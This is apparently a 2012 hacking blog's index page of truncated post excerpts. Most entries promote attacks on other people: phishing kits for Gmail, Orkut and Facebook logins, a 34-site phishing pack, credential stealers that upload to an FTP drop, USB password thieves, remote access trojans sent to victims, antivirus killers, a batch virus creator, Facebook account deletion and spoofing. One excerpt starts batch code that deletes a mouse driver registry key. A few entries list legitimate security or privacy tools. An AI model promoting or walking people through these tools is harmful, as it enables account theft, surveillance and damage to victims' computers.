HACKING GMAIL ACCOUNTS

Gmail phisher is a phisher for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated automatically.

Tuesday, 4 December 2012

Hack Any Computer With An IP :PC HACK

Hack Any Computer With An IP  I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it’s IP. Lets begin…  (1) First you need to download Metasploit. The most up-to-date...

Friday, 16 November 2012

Facebook Message Spoofing : Facebook

Facebook Message Spoofing 1: Sender Email id which is on his/her Facebook account(example@gmail.com) 2: Recivers Facebook Email id (username@facebook.com).Lets Start : STEP 1:  First Go to this Fake mailer site Click here STEP2:  Then...

Facebook 200-1000 likes in 60 seconds : Facebook

 Facebook 200-1000 likes in 60 seconds Hello! as the title says how to get free facebook likes on your pictures /status! no download!1) So the first thing you need to do before starting is to enable subscribers on your facebook you...

Monday, 5 November 2012

Where to Start with hacking

Where to start with hacking? I have seen this question so many times, “Where to start with hacking?” Now I am going to give you my opinion on where to begin. There is just one thing you should remember, “Hacking is a lifestyle”. There...

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page   Step 1: First download Facebook page hacking exploit... Click here to download Step 2: Now open the pagehack.js with notepad and search 4 nk@wildhacker.com and...

Monday, 29 October 2012

Make a virus to disable mouse

  Make a virus to disable mouse    Open Notepad and copy below codes rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete...

Friday, 26 October 2012

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection

WATCH AND LISTEN AUDIO & VIDEO LIVE WITHOUT BUFFERING ON 2G Connection A 2G internet user really suck. You cannot download file Quickly and the most important that many user faces is, they cannot watch or listen online streaming...

How to Send Password Protected Email Messages

 How to Send Password Protected Email Messages If you have to send  information like credit card numbers, Bank details etc it may not be secure to send it without any encryption and password protection.Hackers can use sniffers to...

Monday, 22 October 2012

How To Secure Wifi

Wifi stands for Wireless Fidelity. Most people rush through while setting up their wifi connection without thinking about the security of wifi connection.It is quite understandable that they want to connect to Internet as quickly as possible...

Difference B/w Virus , Worms ,Trojan & Spyware : VIRUSESs

Difference B/w Virus , Worms ,Trojan & Spyware  All of us have heard already about VIRUS , WORMS , TROJANS and SPYWARES but only few ones know the difference b/w them. As usually we considerd every detected thing by antiviruses as VIRUS but its not a case. The antiviruses not only save us from viruses but also protects us from...

Friday, 19 October 2012

Delete Any Facebook Account : Facebook Hacking

Delete Any Facebook Account There is a method to delete any facebook profile .It works 100 percent But its just for educational purpose. Deleted Profile can never be recovered. Use wisely. WHAT ALL U NEED ?  Victim's profile link...

Protect Your Email Id and Facebook from Hackers : Facebook Hacking

Protect Your Email Id and Facebook from Hackers How to Protect Your Email Id n Facebook By Hackers  Everybody use email accounts and social networking websites such as orkut, twitter and facebook. There are important information of...

istealer : Stealers

istealer This is tutorial specially for that people who are know lil bit about configure a stealers server. before start we need to sign up a ftp service i recomended this site http://www.drivehq.com STEP 1  Get the staeler from...

Wednesday, 17 October 2012

Hack Facebook Accounts BY Fake login Page: facebook hacking

Hack Facebook Account By Fake login Page  Today i will teach you how to make a Fake login page (phisher) to Hack Facebook account Follow the steps given below to Hack a facebook account.  Hack a Facebook Account By Fake login...

Hack Facebook Accounts : Facebook Hacking

Hack Facebook Accounts  There are many ways to hack facebook accounts Phishing Keylogging Reverting Cookie stealing etc  This method we will be using is Reverting  which is simply using the information we gathered...

Sunday, 14 October 2012

Yahoo Multi Id Maker : Yahoo

--------------------------- Yahoo multi id maker --------------------------- By this tools you will be able to make  multi unlimited ids. Now you can get rid of making ids manually from yahoo web. And this tools has many function...

Tuesday, 9 October 2012

HACK HOTMAIL ACCOUNTS: Msn Hacker

I had posted already Gmail Hacker to hack Gmail accounts.With this software we can hack hotmail accounts. Run Hotmail Hacker Builder.exe file on ur pc. Enter your email address  password and subject of email you want to receive Click...

Friday, 5 October 2012

KILL TASKS ON VICTIM COMPUTER : AV KILLER

avkiller is software used to bypas firewall, antivirus and many security related programs and softwres services on victim pc. Once the program is executed, avkiller software will run in background and start killing all security ...

FAKE ERROR MESSAGE GENERATOR : MESSAGE MANAGER

Message Manager is a software which show fake error message when it is told to do. You just have to input the txt to be displayed in the error messages and it will display unlimited no. of fake and duplicate error messages.DownloadorH...

HACK PASSWORDS : USB THIEF

usb thief is a collection of small softwares n programs which can stole password locally stored on a pc. Just unpack the .rar file into the root drive of your USB and plug the USB onto that pc on which you want to hack password.DownloadOrH...

SWISS ARMY KNIFE

Swiss Army Knife is software and program which hav ability to perform  tasks of our pc like logoff, shutdown opening Task Manager internet explorer and firefox. It also has builtin hacking tools like Port Scanner Email Bomber Facebook...

SMAC : THE MAC ADDRESS CHANGER

SMAC is easy to use MAC Address Changer for Windows systems network card manufacturers allow this option or not.     Automatically Activate MAC Address after changing     display the manufacturer of the...

INVISIBLE SECRETS

By this program, you will be able to encrypt any file say a program, song, document etc in a carrier file (JPEG or BMP image) and send it to anyone without exposing it to world and your friend or other person can decrypt it on other...

Tuesday, 2 October 2012

WIRESHARK: SNIFFER

Wireshark is a open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can browse the capture data delving down into just the level of packet detail...

TCP DUMP: SNIFFER

Tcpdump is the classic IP sniffer which requires fewer system resources. It is great for tracking down network problems or monitoring activity. Downlo...

Monday, 1 October 2012

HACKING GMAIL ACCOUNTS :PHISING

Gmail phisher is a phisher  for hacking Gmail accounts Like Orkut Phising. Just send it to anyone and ask him to enter his login credentials. Once he enters his login details, a text file containing passwords of the user is generated...

HACKING ORKUT ACCOUNTS :PHISING

Orkut Phisher is a phisher for hacking Orkut accounts like Gmail Phising. Just send it to anyone and say him to enter login details. Once he enters his login details, a text file containing passwords of the user is generated autom...

PHISHER CREATOR

Phisher Creator is an advanced phishing page builder for all websites. We can create phishing page for any website by using this phisher creator to hack any email account.Here is tutorial for Gmail and Orkut Phising Download OR ...

HACK EMAIL ACCOUNTS : 34 IN 1 PHISHER PACK

As the name says, this phisher pack consists of 34 ready made phishing pages of websites like paypal, ebay, yahoo, gmail etc. Download Or He...

HACK COMPUTERS REMOTELY : PRORAT

PRORAT is a remote administration tool (RAT) which is used to access remote PCs. It uses client-server method for remote control and administration of computers. We can create remote access server, downloader server etc. to affect victim's...

REVENGER REMOTE VICTIM PC

Revenger is a simple advanced remote administration tool RAT which is used to access and control pcs remotely . It uses clientserver method for remote control and administration of pcs.create the server n send  to  victim and...

HACK COMPUTERS REMOTELY : TURKOJAN GOLD 4

Turkojan Gold 4 is a remote access Rat which creates a backdoor trojan server and connects with it through a client. You need to create the server and send it to the victim and you can not only track every activity on the victim's PC but...

BATCH TO EXE CONVERTER

Batch to exe converter is a software to convert batch .bat files to executable .exe files. It consists of manyoptions such as including any other file, adding an icon to the file before compilation. DownloadORH...

SONIC BAT - THE BATCH FILE VIRUS CREATOR

This program creates batch .bat viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood"...

Sunday, 30 September 2012

SANDBOXIE

Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.The red arrows indicate changes flowing from a running program into your computer. The box labeled...

DEEP FREEZE: PROTECT YOUR COMPUTER

Like Sandboxie Deep Freeze helps eliminate computer damage and downtime by making computer configurations indestructible. Once Deep Freeze is installed on a workstation, any changes made to the computer — regardless of whether they are accidental...

VULNERABILITY ASSESSMENT TOOL : RETINA

Retina's function is to scan all the hosts on a network and report on any vulnerabilities found.Download h...

THE ULTIMATE PENETRATION TESTING TOOL : METASPLOIT

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public, tested exploits. The Metasploit Project is an open-source computer security project which provides information about security...

VULNERABILITY ASSESSMENT TOOL : NESSUS

Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server...

KISMET

Kismet is a console based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing and can even decloak hidden networks if they are in use. It can automatically detect network...

AIRCRACK

 Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking like Airsnort, but it is more efficient as it can crack both WEP and WPA passwords. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been...

AIRSNORT

 AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Whereas Aircrack can crack both WEP and...

GHOSTSURF PLATINUM

The ultimate IP address hider and anonymizer which include the following features:    Encrypts your Internet connection    Erases all traces of your Web surfing    Removes aggressive spyware   ...

IP ANONYMIZER

IP Anonymizer is a software which hides your IP address by making use of website proxies and enables you to surf. It is simple and easy to use and requires no configuration. Just click on "Enable anonymity online" and it will start its work...

HOTSPOT SHIELD

Hotspot Shield protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Hotspot Shield protects your identity by ensuring that all web...

ANONYMOUS SURFING : TOR

Tor is a very good and free anonymizer program which hides our IP address and protects our privacy. Tor prevents websites from tracking us. Tor provides the foundation for a range of applications that allow organizations and individuals...

PROXY FINDER

Proxy Finder searches the web and find thousands of valid and working proxies in seconds. It can find low, medium and also high anonymity proxies so we can remain anonymous online. DownloadOrH...

free web site traffic and promotion